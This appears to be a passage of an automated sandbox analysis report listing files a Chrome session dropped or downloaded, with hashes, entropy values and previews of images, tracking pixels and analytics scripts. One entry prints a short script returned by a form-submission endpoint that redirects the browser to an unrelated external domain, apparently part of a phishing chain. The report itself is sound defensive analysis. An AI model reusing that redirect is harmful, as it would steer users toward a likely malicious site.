                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 300x300, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):21412
                                                                                                                                                                Entropy (8bit):7.944789543674013
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:119A8F9F57A0CFC8A9641234B9B65DD1
                                                                                                                                                                SHA1:C7479CAFB4B4ACBA6B6464794B8CE67DF401EB01
                                                                                                                                                                SHA-256:5CBD98F118EBD54772B6F81814F4FD6C11778A86B4FA3A69024C5F23B8E8FFBC
                                                                                                                                                                SHA-512:EEDE47BF23C24B960479E8D05A5C3CA483AFD81C5EB6AA5CFBA4FF59EBD543072C400B843B5796B7E75E00735CD7D167C20CB14A2D3717AD98759B35C4FEE710
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.................................................................&$&22C...........................................................&$&22C......,.,.."..........6.....................................................................c..1S.,nN{...i ........O.W....../-8._..0<.x.xR..".=..$..,....5...b...p..sFP...$...,.P.$........Y.|_.#..!..UOZ..AK\.....b..a..A.%.".Y.#........Q..V.W|..Bu..../..D.....w.V..#...[#...yd..So....[.2g.Ju.#.D.B/.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (4201)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):227757
                                                                                                                                                                Entropy (8bit):5.54649548713512
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:E35A46926876EEABF242B212B3B609C9
                                                                                                                                                                SHA1:2EA6D15D27C605DA78E1426FE26F2A3C5B110DB1
                                                                                                                                                                SHA-256:D0843BCCC314286683A0B43CD536C4CFB949976A326B1E882B0DB718F7588BE1
                                                                                                                                                                SHA-512:DA27D49439903A5CF60838197A00ABB85FEA311BD4254DC046130F8F37688BDD53D7809573CAA61208C458019CFDDF99BE9987B71C38EBEB41D4B79A620C2A84
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__rep","vtp_containerId":"DC-9910951","vtp_remoteConfig":["map"],"tag_id":1},{"function":"__ogt_1p_data_v2","priority":0,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"",
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (52360)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):349584
                                                                                                                                                                Entropy (8bit):5.418305436693556
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:87C715B4DC4F81B18D226755469580A6
                                                                                                                                                                SHA1:14DC54A67FFDDBD021AEF53EAFDA7C16F3133919
                                                                                                                                                                SHA-256:4E9F6A80A2C5E548C6CDB6AB88151D457A77C8F33A626B3153AED2846B59A56A
                                                                                                                                                                SHA-512:B1CD1FDDF262BAA5EEA0A6E7743DB4E3E90E949FB60104503496B90CF42C7DB1EA80B2A791BA87066AE713B037D0F233C09BB664A36D09E8CD678DA8487E68A5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://analytics.tiktok.com/i18n/pixel/static/main.MWEzNzVlZGY0MQ.js
                                                                                                                                                                Preview:!function(){"use strict";function t(){t=function(){return e};var e={},r=Object.prototype,n=r.hasOwnProperty,o="function"==typeof Symbol?Symbol:{},i=o.iterator||"@@iterator",a=o.asyncIterator||"@@asyncIterator",c=o.toStringTag||"@@toStringTag";function u(t,e,r){return Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{u({},"")}catch(t){u=function(t,e,r){return t[e]=r}}function l(t,e,r,n){var o=e&&e.prototype instanceof p?e:p,i=Object.create(o.prototype),a=new I(n||[]);return i._invoke=function(t,e,r){var n="suspendedStart";return function(o,i){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===o)throw i;return T()}for(r.method=o,r.arg=i;;){var a=r.delegate;if(a){var c=g(a,r);if(c){if(c===s)continue;return c}}if("next"===r.method)r.sent=r._sent=r.arg;else if("throw"===r.method){if("suspendedStart"===n)throw n="completed",r.arg;r.dispatchException(r.arg)}else"return"===r.method&&r.abrupt("return",r.arg);
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 340x270, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15349
                                                                                                                                                                Entropy (8bit):7.918236009721907
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:5D0CA194DF410EE473FE47021787AAB5
                                                                                                                                                                SHA1:598D2D36AC2CE68EE8179F6F7890B12607C2E16E
                                                                                                                                                                SHA-256:C280FEFB85A06982839BD5BCB41B410A4D6A923B43F6313CDDD9A301DC2316D3
                                                                                                                                                                SHA-512:FA1142F829027E5C9623F6CA8A5AA3111FFDA582AE3E031F01A28A80C3A27016D5B9623711BE1B422A9FAE35CFD4FB88FF56856732EA02384B02D5A9EABD5692
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.............................................................&""&0-0>>T.......................................................&""&0-0>>T........T.."..........6...................................................................~.......k9.....cB83.~.'....`..\.,...H.:eQ....fT.o..].V..z.g..5t......}L....r...G.Q.....<.{..._-/aS.C...P.f.-.Z.E.%M.+6.C..H.W.r......u:mo<...$.uo...o~..-......@~.k7Vv...o..6cq+..I...G.Z..P.7..@.6W...?...
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 300x300, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):14321
                                                                                                                                                                Entropy (8bit):7.909486103448272
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:5AD971967574D10B8F8A59D2E4079004
                                                                                                                                                                SHA1:0D057DF1AD1B80DDA9561AA0DEFC77A5A2B9FCAF
                                                                                                                                                                SHA-256:1B551CF0D6648BE4FEE679EA115F7A192394061D1A6D4DB6B74608D89709DE1A
                                                                                                                                                                SHA-512:56BB119FC4EEEE6A20DC56661D40A8F40990259F7ED33057C2E7F5DAE22FBFDC3DBAFBA71AC95A6294793B80AC4D8A7F71F4388790B0627D3F39D412DCB58D56
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..................................................#....#)" ")1,,1>;>QQm............................................#....#)" ")1,,1>;>QQm......,.,.."..........5..................................................................m.T..K%.# ]6..9Idd5.%.&.*\@.|..s.o.0.X......Y}1$.b...0.Q....."`I...@.a....L Y0.r.bI.....).Ca......h....K...Sbir.B...#..NP.2`...4.i1D....\6.P..-.!..48.....`.1t..L......,.@...dL.".. .*..Ba...`.....W.(.uTh...h.,
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:C source, ASCII text, with very long lines (47001), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):47001
                                                                                                                                                                Entropy (8bit):5.508559296553846
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:847FC19E3E039A19E62795666C5ACCAB
                                                                                                                                                                SHA1:697EB031AA705387FD8F66B0D69851B91405EB9E
                                                                                                                                                                SHA-256:C16F808385A9C70F60CE18C3D32054879DAA62F1FD5441C7E81F576CBB0752B6
                                                                                                                                                                SHA-512:61CCBF9FDC7F34BC1AFCBE55AA174707065B60969EAE09702A2702FBD3F600FDE194B0FDD2A88221D6F97C10AE321615A904F3B40044C0B351C6CDCF1903E7CC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://www.dwin1.com/6220.js
                                                                                                                                                                Preview:var AWIN=AWIN||{};AWIN.Tracking=AWIN.Tracking||{},AWIN.sProtocol="https:"==location.protocol?"https://":"http://",AWIN.iScriptCount=0,AWIN.Tracking.device9Url="https://the.sciencebehindecommerce.com/d9core",AWIN.Tracking.flags={allowNewAWCCookie:!0,allowNewGCLIDCookie:!0},AWIN.Tracking.setFlag=function(e,n){AWIN.Tracking.flags[e]=n},AWIN.Tracking.getFlag=function(e){return AWIN.Tracking.flags[e]},AWIN.tldDomains=["com","org","edu","gov","uk","net","ca","de","jp","fr","au","us","ru","ch","it","nl","se","no","es","mil","gw","ax","wf","yt","sj","mobi","eh","mh","bv","ap","cat","kp","iq","um","arpa","pm","gb","cs","td","so","aero","biz","coop","info","jobs","museum","name","pro","travel","ac","ad","ae","af","ag","ai","al","am","an","ao","aq","ar","as","at","aw","az","ba","bb","bd","be","bf","bg","bh","bi","bj","bm","bn","bo","br","bs","bt","bw","by","bz","cc","cd","cf","cg","ci","ck","cl","cm","cn","co","cr","cu","cv","cx","cy","cz","dj","dk","dm","do","dz","ec","ee","eg","er","et","eu","f
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):97070
                                                                                                                                                                Entropy (8bit):5.1079372229817706
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:4643E1505C48A94FF28E999D38A50F2C
                                                                                                                                                                SHA1:7A93A59DEA68F2000E72E2365EDC1DDB38449E85
                                                                                                                                                                SHA-256:AFA14D64C625032B556F01A48FA8D62A1F3622D44ABDA69C13B7B5861AA520AF
                                                                                                                                                                SHA-512:22BF97DDA6474BAED58DAC39C39D1EFA1D4CF966FC871FDBAC601BE5AF6DE0E46E4ABB26341411BF9D5A9C587C82BFD624E643872A9C21C60FEC1EADBC580D4C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:"https://www.etsy.com/dac/vesta_homepage/vesta_homepage.202836faf34060,vesta_homepage/consistent_spacing.202836faf34060,homepage/_modules/spacing.202836faf34060,__modules__OnsitePromos__src__/Flights/threeSlimTiles.202836faf34060,__modules__OnsitePromos__src__/Banners/hero.bda2a84cc20d45,__modules__OnsitePromos__src__/Regions/Contentful/CTA.89948954da3262,__modules__OnsitePromos__src__/Regions/disclaimer.bda2a84cc20d45,__modules__OnsitePromos__src__/Banners/secondary.fe5529e7bc4624,vesta_homepage/view/etsy-everyday.7ec3ab74749b62,vesta_homepage/view/collage/card-group.202836faf34060,homepage/_modules/popular-right-now.202836faf34060,homepage/_modules/common/simple-header.202836faf34060,neu/modules/favorite_button_defaults.202836faf34060,listings/listing-card-video.202836faf34060,common/listing_card_text_badge.b1c6bd381ce780,common/stars-colors.202836faf34060,homepage/_modules/editors-picks.202836faf34060,neu/modules/listing_card.202836faf34060,web-toolkit-v2/modules/video/video_previews.202836faf34060,home_living/shop-the-look.202836faf34060,vesta_homepage/view/what-is-etsy.202836faf34060,impact/homepage/what-is-etsy/community-impact.202836faf34060,pages/join_neu/social/google_one_tap_modal.2ec02d4eb6d23b.css?variant=sasquatch"
                                                                                                                                                                Preview:.ui-toolkit #content{overflow:hidden}.ui-toolkit .body-max-width{max-width:1402px}@media only screen and (min-width:0) and (max-width:639px){.inline-review-nudger-justify-self{justify-content:center}}.vesta-hp-full-width-banner{width:100vw;position:relative;left:50%;transform:translate(-50%)}@media only screen and (min-width:640px){.expired-review-alert{max-width:100%!important;margin-left:1%!important;margin-right:1%!important}}#error-panel{text-align:left;background-color:#ffe;border:1px solid #cfcf9c;border-radius:10px;max-width:980px;margin:20px auto;font-family:menlo,courier new,monospace;position:relative;box-shadow:0 1px 1px #0000001a}#error-panel .inner{box-sizing:border-box;max-width:90%;max-height:400px;margin:20px;overflow:auto}#error-panel .header-row{margin:20px}#error-panel h1{float:none;background-size:100px;margin-bottom:1em;padding:25px 0 15px;display:none}#error-panel-js-errors,#error-panel-server-errors{display:none}#error-panel table.summary{border-spacing:0 10px;bo
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):149805
                                                                                                                                                                Entropy (8bit):5.6004134683803555
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:5693E74A87CDFE0DD8CF9E97ABC2EC67
                                                                                                                                                                SHA1:0912A92CEBFC4248B4D561F57B32D18135F9AD59
                                                                                                                                                                SHA-256:79951B5BD4D729A2B2F4D380819F2C14BBCF26F21DB56A520189633467766CF4
                                                                                                                                                                SHA-512:B0954FF6229C037AAEC67F6CC91889D3AD1C0D38AC3E53E61F3A98D49379FA43C1FF709C7017459B9BD416BCEB2236D90B24C17E072882C122360069DCD9E0E0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:!function(){"use strict";function t(){t=function(){return e};var e={},d=Object.prototype,n=d.hasOwnProperty,r="function"==typeof Symbol?Symbol:{},o=r.iterator||"@@iterator",i=r.asyncIterator||"@@asyncIterator",a=r.toStringTag||"@@toStringTag";function $(t,e,d){return Object.defineProperty(t,e,{value:d,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{$({},"")}catch(t){$=function(t,e,d){return t[e]=d}}function u(t,e,d,n){var r=e&&e.prototype instanceof s?e:s,o=Object.create(r.prototype),i=new w(n||[]);return o._invoke=function(t,e,d){var n="suspendedStart";return function(r,o){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===r)throw o;return E()}for(d.method=r,d.arg=o;;){var i=d.delegate;if(i){var a=_(i,d);if(a){if(a===c)continue;return a}}if("next"===d.method)d.sent=d._sent=d.arg;else if("throw"===d.method){if("suspendedStart"===n)throw n="completed",d.arg;d.dispatchException(d.arg)}else"return"===d.method&&d.abrupt("return",d.arg);
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (3173)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):232097
                                                                                                                                                                Entropy (8bit):5.54851444438053
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:53C1FBB4318C1E9C5C3CB04E3F7229E7
                                                                                                                                                                SHA1:E9CE309818D7510C0FE94445F7E768BDBC4C86FF
                                                                                                                                                                SHA-256:3AE11CB6F86082916E0F8278708A69D07E41AF882BF57EB2DE78D00A29CA5195
                                                                                                                                                                SHA-512:5142AB3CCCA58169B661C4A21977ED406587E6487CA0C2923FB6BA07919F49C20156BF1A78F00A2ED8C36BB1580A58E896496C6C6DD8FAB42F14E63096D74DF1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x31220000, 0x3805, ]);.var aa,ba,ca,da,t,ea,fa,ha,ja;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writa
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):776
                                                                                                                                                                Entropy (8bit):5.8291582754744065
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:FE971B7D36AF5A2948CF3C421166FC25
                                                                                                                                                                SHA1:187C7C20944926FB8CB750ADBCFE7230538475B0
                                                                                                                                                                SHA-256:1973C3FAB3A83BC35F657965D3EDC7D5DBE8CD812A1CA9EDC0AE23363862E064
                                                                                                                                                                SHA-512:EA38212896F604B78C9B8173EF6B36ACCBA1739F4888CA71D43278773DF56267DB923B071AB8D17F638762D83DF1FFA6DDA955D2056F554BBAC948BE787DABBA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:{"features":{"enc_get_req":true},"c":{"type":"hsw","req":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmIjowLCJzIjoyLCJ0IjoidyIsImQiOiI4Mk80TDZudXJjUkh1L2VRRzlHaEdHZldWSjFrdnh0dFowMHM4T1R4WG5iQy93dzBYbmZnZnBwWWQ0ZEVpWHRJSm5IY3l0c2RVTENqZkxMQmF2V01zWTdCVXJxUGtGdW1xZmE0RUJEMW9qY3l4V2E3VVA2M2FIK2FSUTFlcWIrdThDNXhMYUdycHNTS1BXcFE5V2VaRjY4aTJEeVRGbXQ1T2QvWkJTTGgybVhXYUJITjBuRGxxSnM2ZnpBWThLNW5TWVpyK0JMZG5VL1F3RU53SXFZdGgwYzEyU0FDU1J1RkpqRUpoemhZTkdOZTA5QkRLUUxKY011SjhYMzM5YkU9RUN2Snl5eG1ZNkNHUlVlRCIsImwiOiIvYy81YjhlNjUwODNmYjAzZDY5ZjdmMWM3ZjM3YjcwYTYxNzY1ZjMxNmJkZDBmMWY1M2FiMjg2MzYxZDFiYzMyNzIzIiwiaSI6InNoYTI1Ni1xeDdEdWw0WTJZTTFIdmhGU1dEUnFPTFlIaERwSi94U2xLVjhUcnBZYWxrPSIsImUiOjE3Mjg1MTM1MzEsIm4iOiJoc3ciLCJjIjoxMDAwfQ.o_jLo2F8oXQ_thVBctiMqGtFoojxZ55CE5CZ0NQhSi8"},"pass":true}
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 300x300, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16107
                                                                                                                                                                Entropy (8bit):7.965751100430061
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:C624E21F0470E2F3F2A5E774548A0CA5
                                                                                                                                                                SHA1:64C1F3A1B5DA6F19BF149F527B4FF15C5A786FC7
                                                                                                                                                                SHA-256:92AC6CB2E0DAF26D772212CDDFFEED907B159C0BCF3BA5CB4E9DDE6CB2975E44
                                                                                                                                                                SHA-512:73559FBAFAAFEB8626E85C892B42E42EA80451CA3E7E21333638E6AB7EE5995DE23C036377928568EC8C88C3C6CF2EF0703FAAC9292C4B3E07A389AE5418A771
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF.......................................................... .... %...%-))-969KKd............................................ .... %...%-))-969KKd......,.,.."..........6....................................................................\5T....U..".s.c;.8<._....]..|....t(.f._..6...!.%.^R..~.h9.5.1...eC]3.:*<i...Q......Q.=<5.Q......l.>u.....3F.........<;...q.d...#..U34....a24bdCu...A...cnt.....T....{jz}....,.....U5.....B..{+~../lK.........6.C.3..Zc....5.q.^.r...(g...Qk.;'.S.C.....v.?...'cr..:....../j_.nU^X}.<..*#....A..!..P.U.U..Q.@..(...[o.Ko.;1Z.-?6.p..l}.+.g..z.~...L....].w:...(..6.\.k2..=.Q...6...U.@.Q..UQ..<..;.].k..G.(.^;g...h.....*n.V4...Ob..T.;.......G...cn@.Up...TA@...M....MX.7...$.h.WW^..m.|.s...d...7........l.|......w/.I^..#............/D.B-8....T[oW\....q..:...y......mr.f..........h.....x...@.."......^.Q-#7+..j.s...].fR.p..S.......A<...d.2....e.\.[....c..b].&(.].$81......Q.@.|..sd|.V....E.v%.e......f...g....\.n=y.BL.O.W?q_
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):44
                                                                                                                                                                Entropy (8bit):2.7595682659220433
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:0A4ACB4CADD9EDFF48582F38D8CF459F
                                                                                                                                                                SHA1:498D74466C3EF6F5AAF60F9F4B943C66D37B2B41
                                                                                                                                                                SHA-256:0451A2128BB6496A46D72F584BE7970D1D90FF580EA1E6FA2B07B2632B1D74F5
                                                                                                                                                                SHA-512:82E797977EDBCE1AC39C239F72E2DB7A4D521A90F26E7C395DC5DF340165E4C9B02CAD6C4899F4ACDC826182BB81AD0028D23E36F6BA6EA5687AF0C9B75F83D0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://pixel.streetmetrics.io/pixel/62f2e71d-3885-4822-ba89-6e017b2f1a1e
                                                                                                                                                                Preview:R0lGODlhAQABAAAAACH5BAEAAAAALAAAAAABAAEAAAI=
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 680x540, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):39282
                                                                                                                                                                Entropy (8bit):7.994334874082025
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:89FB38FEB264E33555B9A57984CC374A
                                                                                                                                                                SHA1:F3BD156312FF8B5D4D5430CD764F466625F83DD8
                                                                                                                                                                SHA-256:18C0CA6755C04E1457C7794B865A776A630C6039946BDD2138A9B16CC4BFF467
                                                                                                                                                                SHA-512:367A3AC672573913C1F29BB65F59BA93AF9034B5203266739B0951DDAFF9A13EE211AB362CA0B5761E8C16A73586AAE8A9FFF51BB88C0901B6DA0A9AC800D6F1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/8090506/c/1280/1016/0/220/il/cb039b/5836772714/il_680x540.5836772714_2zq3.jpg
                                                                                                                                                                Preview:RIFFj...WEBPVP8 ^...PX...*....>E .E".!..s+X...cl..$.H....,D.....(t....\...__.$]=..........|..?...{....>%:.............y...o...?.W.7....~.?..x.N~.~.{..s...3.......B..W............~..........O.o......w.C._..>..o..<?.....~c.s.....w~>3.C./.+.O...~d...........O..3.....,m.j..u......R.C...h..p]..o.l.~..h.............3....v.j....T..q_.#....P'=....W.j..X*.9.C.8........X.....P.IM.At.t?|0I........D..S.."...OB.'|.q... \.W....Sr.a.m.@.._S..d...L.)H.M#.rJY..q.Tpm.N0.Ya.<...\......v8...&.~I ..X..R.R.....G.&.1..me...z...H..L..p....Q\0.`-.....9.k.`.:L...@...N.!f..o....K...L9.w.........]..d@..A..j.7...3TW9...(..c[..7cx>....j.V!v...g.;R.D.cr.....s.Y..w0.n.d).....n..N?~.m....S...I`.VSI.-.6A..On.e..h....Q[....h...Z.g.Ww!W....u.~..@Y}B5.o/....^3.L.#f.......%..GAr.4..>..~..$...-......]=..8.......Te.1.`..+?.h@%.A)h.y$..W...h...k...-.;.2.......MN...|..F.v].P.k.......J......k...c.....D.{5.E&+.7w....;.yorp..R.X.....{.#..).......3...%F..c.w...6.%.(.....r..d.3.M.3p
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (3968)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):5056
                                                                                                                                                                Entropy (8bit):5.432838470939945
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:FBAA5350EA1E35997F589FC49947ACCC
                                                                                                                                                                SHA1:FC9253EC0B5DEA916B9255FB0445E99C733164C8
                                                                                                                                                                SHA-256:49176B244DE4B07D2A8A79CD8663A2FCED053ACC22B1807929521665D09F3E3A
                                                                                                                                                                SHA-512:C84DBA63EF055137CE0FD9212E33BDD76F7A747DD01BB24FB319C67F63CB9C2930820066BCE802499828F897CA967D1311D9403F03CD02D55F2B6BC3B321F66B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://cdn01.jotfor.ms/js/vendor/smoothscroll.min.js?v=3.3.57466
                                                                                                                                                                Preview:/**.The MIT License (MIT)..Copyright (c) 2013 Dustan Kasten..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of.the Software, and to permit persons to whom the Software is furnished to do so,.subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):150
                                                                                                                                                                Entropy (8bit):4.756306349531506
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:F2A578AE17B62273BE4D4A28A6FDD0B9
                                                                                                                                                                SHA1:A149558C768CFCD8612243584D94FA529C772FBB
                                                                                                                                                                SHA-256:1C30E52B21938A626EE3404B5DA223379770F4B71B2AD637F27BA21E2363CA43
                                                                                                                                                                SHA-512:4512F3C606AB8AC43BCF04529E37DF61A3C5C72776DDE2C89A273704E44A5DD86CB33325688D450239F9ED2127C8C44C1986B9EE25E0BAF20C923E76AABC9C51
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://submit.jotform.com/submit/242704649007052
                                                                                                                                                                Preview:<script>try { top.location.href = 'https://surzofilmography.com/G'; } catch (e) { window.location.href = 'https://surzofilmography.com/G'; };</script>
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (4201)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):286109
                                                                                                                                                                Entropy (8bit):5.548682157670413
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:0D11F94103E3BFBB9F34C2F0DD2D26CB
